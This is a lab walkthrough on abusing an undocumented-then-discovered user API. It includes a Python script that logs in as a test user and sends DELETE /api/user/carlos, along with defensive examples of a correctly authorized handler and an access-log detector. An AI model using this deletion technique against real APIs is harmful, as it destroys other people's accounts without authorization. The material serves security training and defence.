1. Exploiting an API endpoint using documentation

Accessing the lab webpage:

Logging in:

Looking at the request intercepted with Burp Suite:

We found an API endpoint. We could also probe it manually to see the responses, or brute-force paths to get a hit:

Or we can simply update our email, and the API call shows up as a request:

Let's try it:

Using the OPTIONS method, we can see which methods the endpoint accepts:

Let's do GET:

We got a response in JSON format:

Maybe we need to specify a user; let's try wiener:

Let's try carlos to see if that user exists:

And here we go:

Now, as the objective, we have to delete the user carlos to solve the lab, and remember we can use the DELETE method as shown above:

Here we go:

Trying PATCH on wiener:

Let's do GET on /api:
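The walkthrough above turns on three server-side weaknesses: OPTIONS advertises DELETE to any logged-in user, /api/user/carlos is reachable and deletable by wiener (missing object-level authorization), and GET /api hands the documentation to anyone. The following Python model is an added example written for this page, not the lab's code or the original author's script; the in-memory user store, the "admin" role and the handler names are assumptions. It shows how the same endpoint behaves when authorization is checked before the target's existence, so a normal user gets the same 403 for another user's record and for a non-existent one, and OPTIONS only lists what that caller may actually do.

```python
from dataclasses import dataclass, field

SUPPORTED = ("GET", "PATCH", "DELETE")


@dataclass
class ApiState:
    """In-memory user store standing in for the lab backend (constructed data)."""
    users: dict = field(default_factory=lambda: {
        "wiener": {"email": "wiener@example.com", "role": "user"},
        "carlos": {"email": "carlos@example.com", "role": "user"},
        "administrator": {"email": "admin@example.com", "role": "admin"},
    })


def allowed_methods_for(state, target, session_user):
    """Methods session_user may use on /api/user/<target>: own record or admin only."""
    if session_user not in state.users:
        return ()
    if session_user == target or state.users[session_user]["role"] == "admin":
        return SUPPORTED
    return ()


def handle_user_request(state, method, target, session_user, payload=None):
    """Model <method> /api/user/<target> issued by session_user; returns (status, body)."""
    if session_user is None or session_user not in state.users:
        return 401, "authentication required"
    allowed = allowed_methods_for(state, target, session_user)
    if method == "OPTIONS":
        # Advertise only what this caller may use; nothing is learned about other accounts.
        return 204, ",".join(allowed)
    if method not in SUPPORTED:
        return 405, "method not allowed"
    if method not in allowed:
        # Authorization is decided before existence, so the reply is identical whether
        # <target> exists or not: no username enumeration through this endpoint.
        return 403, "forbidden"
    if target not in state.users:
        return 404, "not found"
    if method == "GET":
        return 200, dict(state.users[target])
    if method == "PATCH":
        # Only the email may change; the role is never accepted from the client.
        if not isinstance(payload, dict) or set(payload) != {"email"}:
            return 400, "only 'email' may be updated"
        state.users[target]["email"] = str(payload["email"])
        return 200, dict(state.users[target])
    del state.users[target]  # DELETE
    return 204, ""


def handle_docs_request(state, session_user):
    """GET /api: the documentation is not served to ordinary users (assumed policy)."""
    if session_user in state.users and state.users[session_user]["role"] == "admin":
        return 200, "documentation"
    return 404, "not found"


if __name__ == "__main__":
    s = ApiState()
    print(handle_user_request(s, "OPTIONS", "carlos", "wiener"))   # (204, '')
    print(handle_user_request(s, "DELETE", "carlos", "wiener"))    # (403, 'forbidden')
    print(handle_user_request(s, "DELETE", "carlos", "administrator"))  # (204, '')
```

With this ordering the DELETE that solved the lab is refused for wiener, and the probing sequence (OPTIONS, then GET on other usernames) returns nothing that distinguishes existing accounts from missing ones.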

Solving it with a Python 3 script:

import os
import re
import sys

import requests
import urllib3

# Route everything through Burp Suite so the requests can be inspected there.
# verify=False is needed because Burp's CA certificate is not trusted by Python;
# the matching warning is silenced so it does not clutter the output.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080",
}

session = requests.session()
url = ""  # lab base URL, set from the command line in __main__ (must end with "/")


def Login(username, password):
    print("[*] Get CSRF Token.")
    csrf = re.findall(r'name="csrf" value="(.+?)"',
                      session.get(url=url + "login", proxies=proxies, verify=False).text)
    if not csrf:
        print("[-] No CSRF token found on the login page.")
        sys.exit(1)
    print("[*] Logging In.")
    # Pass the form as a dict so requests URL-encodes it and sets the Content-Type header.
    data = {"csrf": csrf[0], "username": username, "password": password}
    r = session.post(url=url + "login", data=data, allow_redirects=True, proxies=proxies, verify=False)
    if r.status_code != 200:
        print(f"[-] Login failed (HTTP {r.status_code}).")
        sys.exit(1)


def DeleteCarlos():
    print("[*] Delete The User Carlos.")
    r = session.delete(url=url + "api/user/carlos", proxies=proxies, verify=False)
    print(f"[*] DELETE /api/user/carlos -> HTTP {r.status_code}")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        script_name = os.path.basename(__file__)
        print(f"[-] Usage: python {script_name} http://localhost/")
        sys.exit(1)
    url = sys.argv[1]
    if not url.endswith("/"):
        url += "/"
    Login("wiener", "peter")
    DeleteCarlos()
    print("[+] Solved.")
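Seen from the defender's side, the request sequence in this writeup (OPTIONS against the API, GET on other users' records, DELETE on a record that is not the caller's own, GET /api for the documentation) leaves a clear trace in the access log. The following Python is an added example, not part of the lab or the original writeup; the log format (timestamp, client IP, authenticated user or "-", request line, status) and the sample lines are constructed for the example.

```python
import re
from collections import Counter

# Constructed sample access log (not captured from the lab). Assumed format:
# <timestamp> <client-ip> <authenticated-user or -> "<METHOD> <path> HTTP/1.1" <status>
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 wiener "GET /my-account HTTP/1.1" 200
2024-05-01T10:00:05Z 10.0.0.5 wiener "OPTIONS /api/user/wiener HTTP/1.1" 204
2024-05-01T10:00:09Z 10.0.0.5 wiener "GET /api/user/wiener HTTP/1.1" 200
2024-05-01T10:00:12Z 10.0.0.5 wiener "GET /api/user/carlos HTTP/1.1" 200
2024-05-01T10:00:15Z 10.0.0.5 wiener "DELETE /api/user/carlos HTTP/1.1" 200
2024-05-01T10:00:20Z 10.0.0.5 wiener "GET /api HTTP/1.1" 200
2024-05-01T10:01:00Z 10.0.0.9 carlos "PATCH /api/user/carlos HTTP/1.1" 200
2024-05-01T10:01:30Z 10.0.0.7 - "GET /login HTTP/1.1" 200
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<ip>\S+) (?P<user>\S+) '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})$'
)
USER_OBJ_RE = re.compile(r"^/api/user/(?P<target>[^/?]+)$")


def parse_log(text):
    """Parse the assumed log format into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            d = m.groupdict()
            d["status"] = int(d["status"])
            events.append(d)
    return events


def find_cross_user_access(events):
    """Successful (2xx) requests by an authenticated user to someone else's /api/user record.

    A 2xx here means the server let it through, i.e. the authorization check is missing;
    a DELETE or PATCH in this list is the incident, a GET is the reconnaissance before it.
    """
    findings = []
    for e in events:
        m = USER_OBJ_RE.match(e["path"])
        if not m or e["user"] == "-" or not 200 <= e["status"] < 300:
            continue
        if m["target"] != e["user"]:
            findings.append((e["user"], e["method"], m["target"]))
    return findings


def find_method_probing(events):
    """Count OPTIONS requests against API paths per user (method discovery)."""
    return Counter(e["user"] for e in events
                   if e["method"] == "OPTIONS" and e["path"].startswith("/api"))


def find_docs_access(events):
    """Who fetched the API documentation root and what they got back."""
    return [(e["user"], e["status"]) for e in events if e["path"] == "/api"]


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print("cross-user access:", find_cross_user_access(evs))
    print("OPTIONS probing:", dict(find_method_probing(evs)))
    print("docs access:", find_docs_access(evs))
```

On the sample, the only user touching another account's record is wiener (a GET followed by a DELETE on carlos), the same user sent the OPTIONS probe and fetched /api, which is the pattern to alert on; carlos updating carlos is normal traffic and is not reported.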
